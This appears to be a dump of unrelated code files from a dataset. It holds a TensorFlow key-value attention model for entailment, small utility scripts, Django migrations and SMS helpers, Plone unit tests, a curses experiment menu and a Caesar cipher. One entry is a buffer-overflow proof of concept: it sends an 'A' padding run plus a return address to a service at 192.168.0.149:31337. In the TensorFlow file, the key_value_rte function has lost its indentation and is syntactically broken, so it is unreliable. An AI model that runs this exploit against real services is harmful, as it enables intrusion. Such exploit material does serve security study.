from jtr.nn.models import get_total_trainable_variables, get_total_variables, predictor
def key_value_reader(inputs, lengths, output_size, contexts=(None, None),
                     scope=None, drop_keep_prob=1.0, project_fw_bw=True):
    """Bidirectional LSTM reader whose outputs are split into key/value halves.

    Args:
        inputs: embedded sequence batch; assumed [batch_size x max_length x
            input_size] -- TODO confirm against callers.
        lengths: per-example sequence lengths.
        output_size: LSTM cell size (and projection size when project_fw_bw).
        contexts: optional (forward, backward) initial LSTM states.
        scope: optional variable-scope name (defaults to "key_value_reader").
        drop_keep_prob: output keep probability; dropout is only wrapped in
            when the value differs from 1.0.
        project_fw_bw: if True, project each concatenated fw/bw half back to
            output_size through a tanh fully-connected layer.

    Returns:
        ((outputs_key, outputs_val), states), each output of shape
        [batch_size x max_length x output_size].
    """
    with tf.variable_scope(scope or "key_value_reader") as varscope:
        cell = tf.nn.rnn_cell.LSTMCell(
            output_size,
            state_is_tuple=True,
            initializer=tf.contrib.layers.xavier_initializer()
        )
        if drop_keep_prob != 1.0:
            cell = tf.nn.rnn_cell.DropoutWrapper(
                cell=cell,
                output_keep_prob=drop_keep_prob
            )
        # [batch_size x seq_length x output_size], ?
        # NOTE: the same cell object is passed for both directions
        outputs, states = tf.nn.bidirectional_dynamic_rnn(
            cell,
            cell,
            inputs,
            sequence_length=lengths,
            initial_state_fw=contexts[0],
            initial_state_bw=contexts[1],
            dtype=tf.float32
        )
        outputs_fw, outputs_bw = outputs
        # split each direction's output along the feature axis into a
        # "key" half and a "value" half
        outputs_fw_key, outputs_fw_val = tf.split(outputs_fw, 2, 2)
        outputs_bw_key, outputs_bw_val = tf.split(outputs_bw, 2, 2)
        outputs_key = tf.concat([outputs_fw_key, outputs_bw_key], 2)
        outputs_val = tf.concat([outputs_bw_key, outputs_bw_val], 2) if False else tf.concat([outputs_fw_val, outputs_bw_val], 2)
        if project_fw_bw:
            outputs_key = tf.contrib.layers.fully_connected(
                outputs_key, output_size, activation_fn=tf.tanh)
            outputs_val = tf.contrib.layers.fully_connected(
                outputs_val, output_size, activation_fn=tf.tanh)
        # outputs_key/outputs_val: [batch_size x max_length x output_size]
        return (outputs_key, outputs_val), states
def mutable_attention(memory_states, input, input_lengths,
                      output_size, scope=None):
    """Run an LSTM over *input* that attends into a key/value memory at every
    step (raw_rnn loop).

    Args:
        memory_states: (memory_key, memory_val) pair as produced by
            key_value_reader; assumed [batch_size x mem_length x num_units]
            each -- TODO confirm.
        input: batch of sequences to read; assumed
            [batch_size x max_time x input_depth].
        input_lengths: per-example lengths of *input*.
        output_size: number of LSTM/attention units.
        scope: optional variable-scope name (defaults to "mutable_attention").

    Returns:
        (outputs_batch_major, final_state) where outputs are
        [batch_size x max_time x output_size].
    """
    with tf.variable_scope(scope or "mutable_attention") as varscope1:
        batch_size = tf.shape(input)[0]
        max_time = tf.shape(input)[1]
        input_depth = int(input.get_shape()[2])
        # transforming input to time major for the TensorArray/raw_rnn loop
        input_major = tf.transpose(input, [1, 0, 2])
        num_units = output_size
        # fixme: very hacky and costly way
        input_lengths_cast = tf.cast(input_lengths, tf.int32)
        inputs_ta = tf.TensorArray(dtype=tf.float32, size=max_time)
        inputs_ta = inputs_ta.unpack(input_major)
        # attention controller
        cell = tf.nn.rnn_cell.LSTMCell(num_units)
        # BUG FIX: the second line of this dead block had lost its leading
        # "#" and was a live, dangling continuation -- a SyntaxError.  The
        # whole block is now consistently commented out.
        #attention_states_fw, attention_states_bw = tf.split(memory_states, 2, 0)
        #attention_states = tf.concat([attention_states_fw,
        #                              attention_states_bw], 3)
        #attention_states = tf.squeeze(attention_states, [0])
        memory_key, memory_val = memory_states
        # transforming attention states time major
        memory_key_major = tf.transpose(memory_key, [1, 0, 2])
        memory_val_major = tf.transpose(memory_val, [1, 0, 2])
        attention_states = tf.contrib.layers.linear(memory_key_major, num_units)
        att_len = tf.shape(attention_states)[0]

        def loop_fn(time, cell_output, cell_state, loop_state):
            # raw_rnn body: one decoding step with attention over the memory
            emit_output = cell_output  # == None for time == 0
            if cell_output is None:  # time == 0
                next_cell_state = cell.zero_state(batch_size, tf.float32)
            else:
                next_cell_state = cell_state
            elements_finished = (time >= input_lengths_cast)
            c, query = next_cell_state
            ## Working with memory keys
            # [att_len x batch_size x num_units]
            query_expanded = tf.tile(tf.expand_dims(query, 0), [att_len, 1, 1])
            attention_states_projected = \
                tf.contrib.layers.linear(attention_states, num_units)
            query_projected = \
                tf.contrib.layers.linear(query_expanded, num_units)
            # additive (Bahdanau-style) scoring:
            # [att_len x batch_size x num_units]
            M = tf.tanh(attention_states_projected + query_projected)
            # [batch_size x att_len]
            logits = tf.transpose(tf.squeeze(tf.contrib.layers.linear(M, 1)))
            # [att_len x batch_size]
            alpha = tf.transpose(tf.nn.softmax(logits))
            ## Working with memory vals
            attention_states_flat = tf.reshape(memory_val_major, [-1, num_units])
            alpha_flat = tf.reshape(alpha, [-1, 1])
            # todo: so far only read operation! also use write operation!
            # [batch_size x num_units]
            r = attention_states_flat * alpha_flat
            r_reshaped = tf.reduce_sum(
                tf.reshape(r, [att_len, batch_size, num_units]), [0])
            # combine query and attention read into the next hidden state
            # [batch_size x num_units]
            h = tf.tanh(tf.contrib.layers.linear(
                tf.concat([query, r_reshaped], 1), num_units))
            next_cell_state = tf.nn.rnn_cell.LSTMStateTuple(c, h)
            finished = tf.reduce_all(elements_finished)
            next_input = tf.cond(
                finished,
                lambda: tf.zeros([batch_size, input_depth], dtype=tf.float32),
                lambda: inputs_ta.read(time))
            next_loop_state = None
            return (elements_finished, next_input, next_cell_state,
                    emit_output, next_loop_state)

        outputs_ta, final_state, _ = tf.nn.raw_rnn(cell, loop_fn)
        outputs = outputs_ta.pack()
        outputs_batch_major = tf.transpose(outputs, [1, 0, 2])
        # each [batch_size x max_seq_length x output_size]
        return outputs_batch_major, final_state
def key_value_rte(placeholders, nvocab, **options):
"""
Bidirectional conditional reader with pairs of (question, support)
placeholders: dictionary that should contain placeholders for at least the following keys:
"question"
"question_lengths"
"support"
"support_lengths"
"answers"
Embeds premise (question) and hypothesis (support) with a shared
vocabulary embedder, encodes both with key_value_reader, lets the
hypothesis reader attend over the premise memory (mutable_attention),
and classifies entailment from the final hidden state.
NOTE(review): the original docstring listed "question_length" /
"support_length", but the code reads the plural "*_lengths" keys.
Returns (logits, loss, predict) from `predictor`.
"""
# [batch_size, max_seq1_length]
premise = placeholders['question']
# [batch_size]
premise_lengths = placeholders["question_lengths"]
# [batch_size, max_seq2_length]
hypothesis = placeholders["support"]
# [batch_size]
hypothesis_lengths = placeholders["support_lengths"]
# [batch_size]
targets = placeholders["answers"]
output_size = options["repr_dim_output"]
# Shared embedding variables for both inputs (reuse after the first call).
with tf.variable_scope("embedders") as varscope:
premise_embedded = nvocab(premise)
varscope.reuse_variables()
hypothesis_embedded = nvocab(hypothesis)
# todo: add option for attentive reader
print('TRAINABLE VARIABLES (only embeddings): %d' % get_total_trainable_variables())
with tf.variable_scope("key_value_readers") as varscope:
premise_outputs, _ = \
key_value_reader(premise_embedded, premise_lengths, output_size,
contexts=(None, None), scope=None,
drop_keep_prob=options["drop_keep_prob"],
project_fw_bw=True)
varscope.reuse_variables()
hypothesis_outputs, _ = \
key_value_reader(hypothesis_embedded, hypothesis_lengths, output_size,
contexts=(None, None), scope=None,
drop_keep_prob=options["drop_keep_prob"],
project_fw_bw=True)
# Reading premise with memory of hypothesis
#premise_outputs_processed, premise_state = mutable_attention(
# hypothesis_outputs, premise_outputs[0], premise_lengths, output_size, scope=varscope)
#varscope.reuse_variables()
# Reading hypothesis with memory of premise and altered memory of hypothesis
hypothesis_outputs_processed, hypothesis_state = mutable_attention(
premise_outputs, hypothesis_outputs[0], hypothesis_lengths, output_size)
# todo: read premise and hypothesis memory for inferring entailment class
# fixme: last can be zero because of dynamic_rnn!
#output = hypothesis_outputs[0][:, -1, :]
# Classify from the final attended hidden state of the hypothesis reader.
output = hypothesis_state.h
#targets = tf.Print(targets, [tf.shape(targets)], "targets ")
#output = tf.Print(output, [tf.shape(output)], "outputs ")
logits, loss, predict = predictor(output, targets, options["answer_size"])
print('TRAINABLE VARIABLES (embeddings + model): %d' % get_total_trainable_variables())
print('ALL VARIABLES (embeddings + model): %d' % get_total_variables())
return logits, loss, predict
|
19,208 | e890b5c47280d123db369baf5a6ef61be8ee126b | N = int(input())
# Read N space-separated integers (N was read on the previous line).
D = list(map(int, input().split()))
D.sort()
# Difference between the two middle elements of the sorted list —
# presumably the gap between the upper and lower median for even N;
# NOTE(review): for odd N this indexes past the middle — confirm intent.
res = D[(N - 1) // 2 + 1] - D[(N - 1) // 2]
print(res)
|
19,209 | 5fe6de67131fee38b985b9d8930b788976ada85d | # Generated by Django 3.1.2 on 2020-11-13 00:27
from django.db import migrations
class Migration(migrations.Migration):
"""Auto-generated migration: drop the 'name' column from six payroll
models (contact, employee, employeeallowance, employeededuction,
leavetype, salary). Presumably the field was replaced in the preceding
migration 0005_auto_20201113_0026 — confirm before editing."""
dependencies = [
('payroll', '0005_auto_20201113_0026'),
]
operations = [
migrations.RemoveField(
model_name='contact',
name='name',
),
migrations.RemoveField(
model_name='employee',
name='name',
),
migrations.RemoveField(
model_name='employeeallowance',
name='name',
),
migrations.RemoveField(
model_name='employeededuction',
name='name',
),
migrations.RemoveField(
model_name='leavetype',
name='name',
),
migrations.RemoveField(
model_name='salary',
name='name',
),
]
|
19,210 | c1ff8487a905e411b64e5a62842f865b4fb40b1b | #!/usr/bin/python
import sys, socket
#080414C3
# Buffer-overflow proof of concept (lab/CTF use): 146 filler bytes, then the
# 4-byte return address 0x080414c3 in little-endian order (matches the
# #080414C3 note above).
shellcode = "A" * 146 + "\xc3\x14\x04\x08"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Target service on the lab host; port 31337.
s.connect(('192.168.0.149',31337))
# CRLF terminates the line for line-oriented services.
s.send((shellcode + '\r\n'))
s.close()
#badchars= '\x00\x0a'
|
19,211 | 029d12ed3e3042e70fa8dfef83ce9b4ba716bc8f | import cv2
import numpy as np
# Cartoonize "2.jpg": smooth the colours with Gaussian pyramids and AND the
# result with an adaptive-threshold edge mask.
num_d = 2       # pyramid down/up steps
num_bi = 7      # median-blur kernel size (see medianBlur below)
img_rgb = cv2.imread("2.jpg")
print(img_rgb.shape)
img_rgb = cv2.resize(img_rgb, (800, 800))

# Colour smoothing: downsample then upsample the same number of times.
# (Bug fix: the original ran a first pyrDown loop whose result was
# immediately discarded by re-assigning img_color = img_rgb — dead work.)
img_color = img_rgb
for _ in range(num_d):
    img_color = cv2.pyrDown(img_color)
for _ in range(num_d):
    img_color = cv2.pyrUp(img_color)

# Edge mask: grayscale -> median blur -> adaptive mean threshold.
# NOTE(review): cv2.imread yields BGR, so COLOR_RGB2GRAY is formally the
# wrong flag; kept as-is because changing it alters the output image.
img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_RGB2GRAY)
img_blur = cv2.medianBlur(img_gray, 7)
img_edge = cv2.adaptiveThreshold(img_blur, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, blockSize=9, C=2)
img_edge = cv2.cvtColor(img_edge, cv2.COLOR_GRAY2RGB)

# Keep smoothed colours only where the edge mask is white.
img_cartoon = cv2.bitwise_and(img_color, img_edge)
cv2.imshow('img ', img_cartoon)
stack = np.hstack([img_rgb, img_cartoon])
#cv2.imshow('Stacked images', stack)
cv2.waitKey(0)
cv2.imwrite("cartoon.jpg", img_cartoon)
19,212 | 782b08ad7eafeb686667cb4afc194a4759e8dfaa | from ftw.testing import MockTestCase
from opengever.task.browser.transitioncontroller import ITaskTransitionController
from opengever.task.browser.transitioncontroller import TaskTransitionController
from opengever.task.interfaces import ISuccessorTaskController
from Products.CMFPlone.interfaces import IPloneSiteRoot
from xml.dom.minidom import parse
from zope.app.component.hooks import setSite
from zope.component import getSiteManager
from zope.interface import alsoProvides
from zope.interface import Interface
from zope.interface.verify import verifyClass
import os.path
class TestTaskTransitionController(MockTestCase):
"""Mocker-based unit tests for TaskTransitionController.

Verifies the controller implements ITaskTransitionController, that the
workflow definition XML routes every transition through the controller
view, and that get_transition_action picks between the plain
addresponse form and the complete_successor_task wizard depending on
task type category, responsibility, and predecessor type.
"""
def setUp(self):
super(TestTaskTransitionController, self).setUp()
# we need a site root so that cache-key computation works.
root = self.create_dummy(getSiteManager=getSiteManager,
id='root')
alsoProvides(root, IPloneSiteRoot)
setSite(root)
def test_verify_class(self):
self.assertTrue(
verifyClass(ITaskTransitionController,
TaskTransitionController))
def test_transitions_in_defintion_use_controller(self):
# Parse the GenericSetup workflow definition and assert every
# transition's action URL and guard expression delegate to the
# task_transition_controller view.
import opengever.task
path = os.path.join(
os.path.dirname(os.path.abspath(opengever.task.__file__)),
'profiles', 'default', 'workflows', 'opengever_task_workflow',
'definition.xml')
self.assertTrue(os.path.isfile(path))
doc = parse(path)
for node in doc.getElementsByTagName('transition'):
transition = node.getAttribute('transition_id')
self.assertEqual(node.getAttribute('title'), transition)
actions = node.getElementsByTagName('action')
self.assertEqual(len(actions), 1)
self.assertEqual(actions[0].firstChild.nodeValue, transition)
self.assertEqual(
actions[0].getAttribute('url'),
'%(content_url)s/@@task_transition_controller?transition=' +\
transition)
guard = node.getElementsByTagName('guard-expression')[0]
self.assertEqual(
guard.firstChild.nodeValue,
"python: here.restrictedTraverse('@@task_transition_" + \
"controller').is_transition_possible('%s')" % transition)
def test_is_administrator(self):
# _is_administrator is true if the member has either the
# Administrator or the Manager role; expectations below are ordered.
task1 = self.stub()
mock = self.stub()
self.mock_tool(mock, 'portal_membership')
self.expect(mock.getAuthenticatedMember()).result(mock)
with self.mocker.order():
self.expect(mock.has_role('Administrator')).result(0)
self.expect(mock.has_role('Manager')).result(0)
self.expect(mock.has_role('Administrator')).result(0)
self.expect(mock.has_role('Manager')).result(1)
self.expect(mock.has_role('Administrator')).result(1)
self.replay()
self.assertFalse(
TaskTransitionController(task1, {})._is_administrator())
self.assertTrue(
TaskTransitionController(task1, {})._is_administrator())
self.assertTrue(
TaskTransitionController(task1, {})._is_administrator())
def test_cancelled_to_open_actions(self):
transition = 'task-transition-cancelled-open'
controller, controller_mock, task = self._create_task_controller()
self.replay()
self.assertEqual(controller.get_transition_action(transition),
'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition)
def test_progress_to_resolved_actions(self):
transition = 'task-transition-in-progress-resolved'
controller, controller_mock, task = self._create_task_controller()
stc = self.stub()
self.mock_adapter(
stc, ISuccessorTaskController, [Interface])
with self.mocker.order():
# testcase 1: unival -> default form
self.expect(task.task_type_category).result(
'unidirectional_by_value')
# testcase 2: uniref -> default form
self.expect(task.task_type_category).result(
'unidirectional_by_reference')
# testcase 3: not responsible -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
False)
# testcase 4: no predecessor -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result(None)
# testcase 5: no predecessor -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result('client2:213')
self.expect(stc(task).get_predecessor().task_type).result(
'forwarding_task_type')
# testcase 6: -> complete task wizard
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result('client2:123')
self.expect(stc(task).get_predecessor().task_type).result(
'bidirectional_by_reference')
self.replay()
wizard_url = 'http://nohost/plone/task-1/' + \
'@@complete_successor_task?transition=%s' % transition
default_url = 'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition
# testcase 1: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 2: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 3: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 4: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 5: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 6: complete task wizard
self.assertEqual(controller.get_transition_action(transition),
wizard_url)
def test_progress_to_closed_actions(self):
transition = 'task-transition-in-progress-tested-and-closed'
controller, controller_mock, task = self._create_task_controller()
stc = self.stub()
self.mock_adapter(
stc, ISuccessorTaskController, [Interface])
with self.mocker.order():
# testcase 1: unival -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_value')
# testcase 2: uniref -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
# testcase 3: not responsible -> default form
self.expect(task.task_type_category).result(
'unidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
False)
# testcase 4: no predecessor -> default form
self.expect(task.task_type_category).result(
'unidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result(None)
# testcase 5: no predecessor -> default form
self.expect(task.task_type_category).result(
'unidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result('client2:123')
self.expect(stc(task).get_predecessor().task_type).result(
'forwarding_task_type')
# testcase 6: -> complete task wizard
self.expect(task.task_type_category).result(
'unidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result('client2:123')
self.expect(stc(task).get_predecessor().task_type).result(
'unidirectional_by_reference')
self.replay()
wizard_url = 'http://nohost/plone/task-1/' + \
'@@complete_successor_task?transition=%s' % transition
default_url = 'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition
# testcase 1: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 2: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 3: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 4: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 5: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 6: complete task wizard
self.assertEqual(controller.get_transition_action(transition),
wizard_url)
def test_open_to_cancel_actions(self):
transition = 'task-transition-open-cancelled'
controller, controller_mock, task = self._create_task_controller()
self.replay()
self.assertEqual(controller.get_transition_action(transition),
'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition)
def test_open_to_reject_actions(self):
transition = 'task-transition-open-rejected'
controller, controller_mock, task = self._create_task_controller()
self.replay()
self.assertEqual(controller.get_transition_action(transition),
'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition)
def test_open_to_resolved_actions(self):
transition = 'task-transition-open-resolved'
controller, controller_mock, task = self._create_task_controller()
successor_task_controller = self.stub()
self.mock_adapter(
successor_task_controller, ISuccessorTaskController, [Interface])
with self.mocker.order():
# testcase 1: unival -> default form
self.expect(task.task_type_category).result(
'unidirectional_by_value')
# testcase 2: uniref -> default form
self.expect(task.task_type_category).result(
'unidirectional_by_reference')
# testcase 3: not responsible -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
False)
# testcase 4: no predecessor -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result(None)
# testcase 5: no predecessor -> default form
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result('client2:123')
self.expect(
successor_task_controller(task).get_predecessor().task_type
).result('forwarding_task_type')
# testcase 6: -> complete task wizard
self.expect(task.task_type_category).result(
'bidirectional_by_reference')
self.expect(
controller_mock._is_responsible_or_inbox_group_user()).result(
True)
self.expect(task.predecessor).result('client2:123')
self.expect(
successor_task_controller(task).get_predecessor().task_type
).result('bidirectional_by_reference')
self.replay()
wizard_url = 'http://nohost/plone/task-1/' + \
'@@complete_successor_task?transition=%s' % transition
default_url = 'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition
# testcase 1: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 2: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 3: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 4: default form
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 5: predecessor is a forwarding
self.assertEqual(controller.get_transition_action(transition),
default_url)
# testcase 6: complete task wizard
self.assertEqual(controller.get_transition_action(transition),
wizard_url)
def test_reassign_actions(self):
transition = 'task-transition-reassign'
controller, controller_mock, task = self._create_task_controller()
self.replay()
self.assertEqual(controller.get_transition_action(transition),
'http://nohost/plone/task-1/@@assign-task?' + \
'form.widgets.transition=%s' % transition)
def test_rejected_to_open_actions(self):
transition = 'task-transition-rejected-open'
controller, controller_mock, task = self._create_task_controller()
self.replay()
self.assertEqual(controller.get_transition_action(transition),
'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition)
def test_resolved_to_closed_actions(self):
transition = 'task-transition-resolved-tested-and-closed'
controller, controller_mock, task = self._create_task_controller()
self.replay()
self.assertEqual(controller.get_transition_action(transition),
'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition)
def test_resolved_to_progress_actions(self):
transition = 'task-transition-resolved-in-progress'
controller, controller_mock, task = self._create_task_controller()
self.replay()
self.assertEqual(controller.get_transition_action(transition),
'http://nohost/plone/task-1/addresponse?' + \
'form.widgets.transition=%s' % transition)
def _create_task_controller(self):
"""Build a controller around a mocked task at /plone/task-1.

The controller itself is patched so _is_administrator() always
returns False; tests add further expectations before replay().
"""
task1 = self.mocker.mock()
self.expect(task1.absolute_url()).result(
'http://nohost/plone/task-1').count(0, None)
self.expect(task1.getPhysicalPath()).result(
['', 'plone', 'task-1']).count(0, None)
controller = TaskTransitionController(task1, {})
controller_mock = self.mocker.patch(controller)
self.expect(controller_mock._is_administrator()).result(False).count(0, None)
return controller, controller_mock, task1
|
19,213 | ef048167dfd8398519beb3868826c7011728d49c | #! /usr/bin/env python
# Public crawler submodules exported by this package.
__all__ = ['base_crawler', 'horriblesubs_crawler']
|
19,214 | 3ffe78a91dda514cf17451b312606fab99dfdd6c | '''
Дана послідовність цілих чисел а1, ... a30. Нехай М - найбільше з цих чисел, а m -
найменше. Вивести на екран у порядку зростання всі цілі з інтервалу (m, M), які не
входять до послідовність а1, ... а30.
'''
from random import randint
# Repeatedly: draw 30 random integers, print all integers strictly between
# min and max that do not occur in the sequence, then ask whether to repeat.
while True:
    # The docstring specifies a1..a30, so draw exactly 30 values.
    # (The original used range(31) and produced 31 numbers.)
    a = [randint(1, 50) for _ in range(30)]
    M = max(a)
    m = min(a)
    # Bug fix: the original removed items from z while indexing it
    # (z.remove(z[j]) inside "for j in range(len(z))"), which skips
    # neighbours of removed items and can raise IndexError. A filtering
    # comprehension is correct. m and M are members of a, so they are
    # filtered out automatically, leaving the open interval (m, M).
    z = [i for i in range(m, M + 1) if i not in a]
    print(z)
    key = input('Again? Yes - 1, no - 2: ')
    if key == '1':
        continue
    else:
        print('Bye')
        break
19,215 | c58d0fae2a79baeeccac356fa3b213ff38587284 | from pythongame.core.common import ItemType, Sprite, UiIconSprite, HeroStat, StatModifierInterval
from pythongame.core.item_inventory import ItemEquipmentCategory
from pythongame.game_data.items.register_items_util import register_randomized_stat_modifying_item
def register_leather_armor_item():
"""Register the level-1 Leather Armor chest item.

Declarative registration: fixed icon/sprite/image resources and a
single randomized stat roll granting exactly +1 armor (the interval
list contains only the value 1).
"""
register_randomized_stat_modifying_item(
item_type=ItemType.LEATHER_ARMOR,
item_level=1,
ui_icon_sprite=UiIconSprite.ITEM_LEATHER_ARMOR,
sprite=Sprite.ITEM_LEATHER_ARMOR,
image_file_path="resources/graphics/item_leather_armor.png",
item_equipment_category=ItemEquipmentCategory.CHEST,
name="Leather armor",
stat_modifier_intervals=[StatModifierInterval(HeroStat.ARMOR, [1])]
)
19,216 | 812d135d612404753b19d388b9c3b7c42c05337d | #from django.http import HttpResponse
from django.shortcuts import render
def home(request):
return render(request,'home.html')
def count(request):
total_count=(len(request.GET['text']))
user_text=request.GET['text']
type(user_text)
word_count={}
for word in user_text:
if word not in word_count:
word_count[word]=1
else:
word_count[word]+=1
sorted_dict=sorted(word_count.items(),key=lambda m:m[1],reverse=True)
return render(request,'count.html',
{'count':total_count,'user_text':user_text,
'wordcount':word_count,'sorteddict':sorted_dict})
def about(request):
"""Render the static 'about' page."""
return render(request,'about.html') |
19,217 | a2fb05e13d0292ce045092e2c6b6414c4f011b54 | from typing import Protocol
def sms_decorator(func, to):
    """Wrap a zero-argument send callable so successful sends are logged.

    Whenever func() returns a truthy result, an SMSMessage row is created
    for the destination number *to*.

    Bug fix: the wrapper now propagates func's return value; previously it
    always returned None, so callers of send_sms() (declared -> str) never
    saw the provider's result.
    """
    from ..models import SMSMessage  # local import, presumably to avoid a circular dependency

    def wrapper():
        result = func()
        if result:
            SMSMessage.objects.create(phone_number=to)
        return result
    return wrapper
class SMSProviderClass(Protocol):
"""Structural interface for SMS providers.

Any object with these attributes and a send_sms() method satisfies
the protocol (duck typing; no inheritance required).
"""
# destination phone number
to: str
# message body to deliver
message: str
# provider-specific configuration
conf: dict
def send_sms(self) -> None:
pass
class SMSProvider:
"""Base class for SMS providers; subclasses implement send_sms().

Attribute access is intercepted so that *any* lookup of "send_sms"
(including on subclasses) returns the method wrapped by sms_decorator,
which logs an SMSMessage on a truthy send result.
"""
def __getattribute__(self, item):
element = super().__getattribute__(item)
# Wrap only the bound send_sms method; everything else passes through.
# NOTE(review): self.to inside this hook re-enters __getattribute__,
# which is fine because 'to' is not itself wrapped.
if callable(element) and item == "send_sms":
return sms_decorator(element, self.to)
return element
def __init__(self, to, message, conf):
self.to = to
self.message = message
self.conf = conf
def send_sms(self) -> str:
raise NotImplementedError()
|
19,218 | 1761783aa65dbc12111b59ea25b9cb7ad8cc9a20 | from cursesmenu import *
from cursesmenu.items import *
import sys
import os
# '1': Example
# '2': Matrix A
# '3': Rest
# '4': Show Config
# Build the "Declarative Task - Day One" curses menu.
# Usage: <script> <subject_id>; each entry launches a src/ script as a
# subprocess with the phase name and subject id as arguments.
# On macOS an explicit python2.7 binary is used.
if sys.platform == 'darwin':
python = 'python2.7'
else:
python = 'python'
# Create the menu
menu = CursesMenu("Declarative Task - Day One", 'Subject: ' + sys.argv[1])
dayOneExample = CommandItem(text='Example',
command=python + " src" + os.path.sep + "ld_example.py",
arguments='Example, ' + sys.argv[1],
menu=menu,
should_exit=False)
soundVolumeAdjustment = CommandItem(text='sound Volume Adjustment',
command=python + " src" + os.path.sep + "ld_calibrateSoundVolumeSubprocess.py",
arguments=sys.argv[1],
menu=menu,
should_exit=False)
dayOnePreLearning = CommandItem(text="PreLearning",
command=python + " src" + os.path.sep + "ld_declarativeTask.py ",
arguments="DayOne-PreLearning, " + sys.argv[1],
menu=menu,
should_exit=False)
dayOneLearning = CommandItem(text="Matrix A",
command=python + " src" + os.path.sep + "ld_declarativeTask_relauncher.py ",
arguments="DayOne-Learning, " + sys.argv[1],
menu=menu,
should_exit=False)
dayOneTestMatrixA = CommandItem(text="Test Matrix A",
command=python + " src" + os.path.sep + "ld_declarativeTask.py ",
arguments="Day One - Test Learning, " + sys.argv[1],
menu=menu,
should_exit=False)
dayOneConsolidationMatrixA = CommandItem(text="Consolidation Matrix A",
command=python + " src" + os.path.sep + "ld_declarativeTask.py ",
arguments="Day One - Test Consolidation, " + sys.argv[1],
menu=menu,
should_exit=False)
dayOneRecognition = CommandItem(text="Recognition",
command=python + " src" + os.path.sep + "ld_recognition.py ",
arguments="Day One - Recognition, " + sys.argv[1],
menu=menu,
should_exit=False)
dayOneConfig = CommandItem(text='Show config file',
command=python + " src" + os.path.sep + "ld_showConfigFile.py",
menu=menu,
should_exit=False)
# Menu order: PreLearning is deliberately listed before the volume
# adjustment, unlike the definition order above — presumably the intended
# session order; confirm with the protocol before changing.
menu.append_item(dayOneExample)
menu.append_item(dayOnePreLearning)
menu.append_item(soundVolumeAdjustment)
menu.append_item(dayOneLearning)
menu.append_item(dayOneTestMatrixA)
menu.append_item(dayOneConsolidationMatrixA)
menu.append_item(dayOneRecognition)
menu.append_item(dayOneConfig)
# Blocks until the user exits the menu.
menu.show()
|
19,219 | 000f1bd532b51e33d623242f5256e7d3e85397d6 | """
Assignment 1: Cryptography
Course: CS 92SI
Name: <YOUR NAME>
Date: <DATE>
Replace this with a description of the program.
"""
# Caesar(+3) translation tables for both letter cases, with wrap-around.
# plain_to_cipher shifts each letter forward by 3; cipher_to_plain is the
# inverse table (shift back by 3). Non-letters are intentionally absent,
# so lookups of other characters raise KeyError.
plain_to_cipher = {}
cipher_to_plain = {}
for _alphabet in ('abcdefghijklmnopqrstuvwxyz',
                  'ABCDEFGHIJKLMNOPQRSTUVWXYZ'):
    for _index, _letter in enumerate(_alphabet):
        plain_to_cipher[_letter] = _alphabet[(_index + 3) % 26]
        cipher_to_plain[_letter] = _alphabet[(_index - 3) % 26]
def encrypt_caesar(plaintext):
    """Encrypt *plaintext* with a Caesar(+3) cipher.

    The input is upper-cased first, so the result is always upper case.
    Raises KeyError for any character outside A-Z/a-z.
    """
    return ''.join(map(plain_to_cipher.__getitem__, plaintext.upper()))
def decrypt_caesar(ciphertext):
    """Decrypt a Caesar(+3) ciphertext.

    The input is upper-cased first, so the result is always upper case.
    Raises KeyError for any character outside A-Z/a-z.
    """
    return ''.join(map(cipher_to_plain.__getitem__, ciphertext.upper()))
